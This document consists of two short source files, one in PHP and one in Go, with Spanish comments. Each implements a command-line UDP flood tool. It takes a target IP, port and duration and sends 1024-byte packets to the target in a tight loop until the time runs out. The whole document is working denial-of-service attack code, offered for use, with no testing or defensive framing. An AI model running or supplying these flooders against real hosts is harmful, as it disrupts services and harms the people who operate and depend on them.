File: udp.php
<?php

// Obtener los argumentos de la línea de comandos
$targetIp = $argv[1] ?? null;
$targetPort = $argv[2] ?? null;
$duration = $argv[3] ?? null;

// Validar los argumentos
if (!$targetIp || !is_numeric($targetPort) || !is_numeric($duration)) {
    echo "Uso: php udpflooder.php <ip_objetivo> <puerto_objetivo> <duracion_en_segundos>\n";
    exit(1);
}

$targetPort = (int)$targetPort;
$duration = (int)$duration;

// Crear el socket UDP
$socket = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);

if (!$socket) {
    echo "Error al crear el socket: " . socket_strerror(socket_last_error()) . "\n";
    exit(1);
}

// Datos a enviar (puedes cambiar esto)
$data = str_repeat("A", 1024); // Crea una cadena de 1024 bytes con la letra "A"

echo "Iniciando inundación UDP a $targetIp:$targetPort durante $duration segundos...\n";

$startTime = time();

while (time() - $startTime < $duration) {
    $bytesSent = socket_sendto($socket, $data, strlen($data), 0, $targetIp, $targetPort);

    if ($bytesSent === false) {
        echo "Error al enviar datos: " . socket_strerror(socket_last_error($socket)) . "\n";
    }  //else {
       //echo "Enviados $bytesSent bytes a $targetIp:$targetPort\n"; // Esto puede llenar la terminal rápidamente
    //}
}

echo "Inundación completada.\n";

// Cerrar el socket
socket_close($socket);

?>

File: udp.go
package main

import (
	"fmt"
	"net"
	"os"
	"strconv"
	"time"
)

func main() {
	// Obtener los argumentos de la línea de comandos
	if len(os.Args) != 4 {
		fmt.Println("Uso: go run udpflooder.go <ip_objetivo> <puerto_objetivo> <duracion_en_segundos>")
		os.Exit(1)
	}

	targetIp := os.Args[1]
	targetPortStr := os.Args[2]
	durationStr := os.Args[3]

	targetPort, err := strconv.Atoi(targetPortStr)
	if err != nil {
		fmt.Println("Error: El puerto debe ser un número entero.")
		os.Exit(1)
	}

	duration, err := strconv.Atoi(durationStr)
	if err != nil {
		fmt.Println("Error: La duración debe ser un número entero.")
		os.Exit(1)
	}

	// Resolver la dirección del destino
	addr, err := net.ResolveUDPAddr("udp", targetIp+":"+strconv.Itoa(targetPort))
	if err != nil {
		fmt.Println("Error al resolver la dirección:", err)
		os.Exit(1)
	}

	// Crear el socket UDP
	conn, err := net.DialUDP("udp", nil, addr)
	if err != nil {
		fmt.Println("Error al conectar:", err)
		os.Exit(1)
	}
	defer conn.Close() // Asegurarse de cerrar la conexión al final

	// Datos a enviar (puedes cambiar esto)
	data := make([]byte, 1024)
	for i := range data {
		data[i] = 'A'
	}

	fmt.Printf("Iniciando inundación UDP a %s:%d durante %d segundos...\n", targetIp, targetPort, duration)

	startTime := time.Now()

	for time.Since(startTime).Seconds() < float64(duration) {
		_, err := conn.Write(data)
		if err != nil {
			fmt.Println("Error al enviar datos:", err)
		} //else {
		  //	fmt.Println("Enviados bytes") //Esto llenará la terminal rápidamente
		  //}

	}

	fmt.Println("Inundación completada.")
}
